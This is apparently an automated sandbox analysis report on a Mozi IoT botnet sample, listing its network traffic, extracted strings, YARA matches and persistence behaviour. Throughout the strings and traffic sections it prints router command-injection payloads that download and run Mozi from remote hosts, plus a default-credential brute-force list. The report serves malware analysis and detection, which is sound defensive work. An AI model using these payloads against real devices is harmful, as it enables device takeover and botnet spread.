Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Source: unknown

HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.196.113.75:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 May 2021 18:05:29 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 287Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 69 6e 75 73 76 2e 66 76 64 73 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at sinusv.fvds.ru Port 80</address></body></html>

Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m;
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/bin.sh
Source: nT7K5GG5km	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: nT7K5GG5km	String found in binary or memory: http://127.0.0.1
Source: nT7K5GG5km	String found in binary or memory: http://127.0.0.1sendcmd
Source: nT7K5GG5km	String found in binary or memory: http://HTTP/1.1
Source: nT7K5GG5km	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: nT7K5GG5km	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: nT7K5GG5km	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: nT7K5GG5km	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: nT7K5GG5km	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: nT7K5GG5km	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk

Source: /tmp/nT7K5GG5km (PID: 4600)

HTML file containing JavaScript created: /usr/networks

Jump to dropped file

System Summary:

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample	String containing 'busybox' found: /bin/busybox cat /bin/ls\|more
Source: Initial sample	String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls\|head -n 1
Source: Initial sample	String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls \|\| /bin/busybox cat /bin/ls \|\| while read i; do printf $i; done < /bin/ls \|\| while read i; do printf $i; done < /bin/busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample	String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh \|\|curl -O http://%s:%d/bin.sh \|\|/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh \|\|(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample	String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i \|\| (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample	String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i \|\|curl -O http://%s:%d/i \|\|/bin/busybox wget http://%s:%d/i;chmod 777 i \|\|(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Sample contains strings indicative of password brute-forcing capabilities

Source: Initial sample	String containing potential weak password found: admin
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: supervisor
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: 123456
Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: 12345
Source: Initial sample	String containing potential weak password found: admin1234

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: POST /cdn-cgi/
Source: Initial sample	Potential command found: GET /c HTTP/1.0
Source: Initial sample	Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample	Potential command found: GET %s HTTP/1.1
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample	Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample	Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample	Potential command found: mount -o remount,rw /overlay /
Source: Initial sample	Potential command found: mv -f %s %s
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: GET /c
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample	Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample	Potential command found: killall -9 %s
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample	Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample	Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample	Potential command found: dd bs=52 count=1 if=/bin/ls \|\| cat /bin/ls \|\| while read i; do echo $i; done < /bin/ls \|\| while read i; do echo $i; done < /bin/busybox
Source: Initial sample	Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Yara signature match

Source: nT7K5GG5km, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/221@4/0

Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 4638)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5042)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/nT7K5GG5km (PID: 4600)

File: /proc/4600/mounts

Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/cedilla-portuguese.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/apps-bin-path.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/Z97-byobu.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/bash_completion.sh	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/profile.d/vte-2.91.sh	Jump to behavior

Sample tries to persist itself using System V runlevels

